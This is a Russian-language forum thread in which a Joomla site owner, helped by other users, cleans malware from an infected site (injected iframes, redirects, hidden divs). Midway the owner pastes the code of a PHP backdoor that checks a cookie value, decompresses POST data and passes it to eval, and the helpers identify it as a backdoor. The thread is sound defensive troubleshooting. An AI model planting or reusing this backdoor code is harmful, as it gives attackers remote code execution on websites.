Проблемы с чисткой сайта, выкидывает на OpenDNS - Безопасность сайтов на Joomla

Привет всем. Прошу помощи, разобраться с сайтом.
В общем в начале пролезла какая-то зараза, постоянно в строке состояния крутились непонятные адреса, нашел... -iframe в конце .js файлов был, воспользовался скриптом очистки, почистил он около 160 файлов.
С довольным лицом начал проверять сайт, а там... еще какой-то OpenDNS Guide (пишет - Hmm, template-license.ru isn't loading right now.)
мой сайт на секунду грузится и потом сразу пропадает и появляется этот с сайт с OpenDNS-ом.
Как это можно исправить? я так понимаю где то осталась зараза еще?

Знаний особо нет, поэтому решил спросить здесь. Если кому не трудно, посмотрите пожалуйста.
(такое подозрение, что все пошло после установки модуля ModulesAnywhere)

Сайт: www.detdom-uk.ru

Светит блок на главной странице сайта <div style='position:absolute;left:-4501px;width:531px'>
Искать в файлах сайта- base64_decode

Спасибо огромное. Нашел скрипт, им почистил base64_decode в файлах.
Сайт начал открываться. Все же какие-то адреса так и грузятся в строке состояния, и рамблер мелькает, и Google, и еще какой то непонятный адрес мелькает.
Еще воспользовался сканером с сайта Site-security, во что он вывел ну пару строчек приведу

File: /home/detdomuk/public_html/plugins/content/BonckoLen/626f34.php
String:: $_POST[

File: /home/detdomuk/public_html/plugins/content/sigplus/engines/fancybox/css/07fc6806c.php
String:: $_POST[

File: /home/detdomuk/public_html/plugins/editors/tinymce/jscripts/tiny_mce/langs/60d7dde16.php
String:: $_POST[

Я так понимаю что эти файлы .php с номерами не должны там быть? Удалять их?
а в самом файле php с номером непонятным, вот это прописано:
if(!empty($_COOKIE['__utma']) and substr($_COOKIE['__utma'],0,16)=='3469825000034634'){
if (!empty($_POST['msg']) and $msg=@gzinflate(@(@str_replace(' ','',urldecode($_POST['msg']))))){
  echo '<textarea id=areatext>';
  eval($msg);
  echo '</textarea>bg';
  exit;
вирус?

Почти вирус.Бекдор. Удаляй
Проверяй, а лучше замени на стандартный, с переносом твоих правок, файл .htaccess

Еще раз Спасибо!
Вроде почистил сайт, проверки ничего не показывают.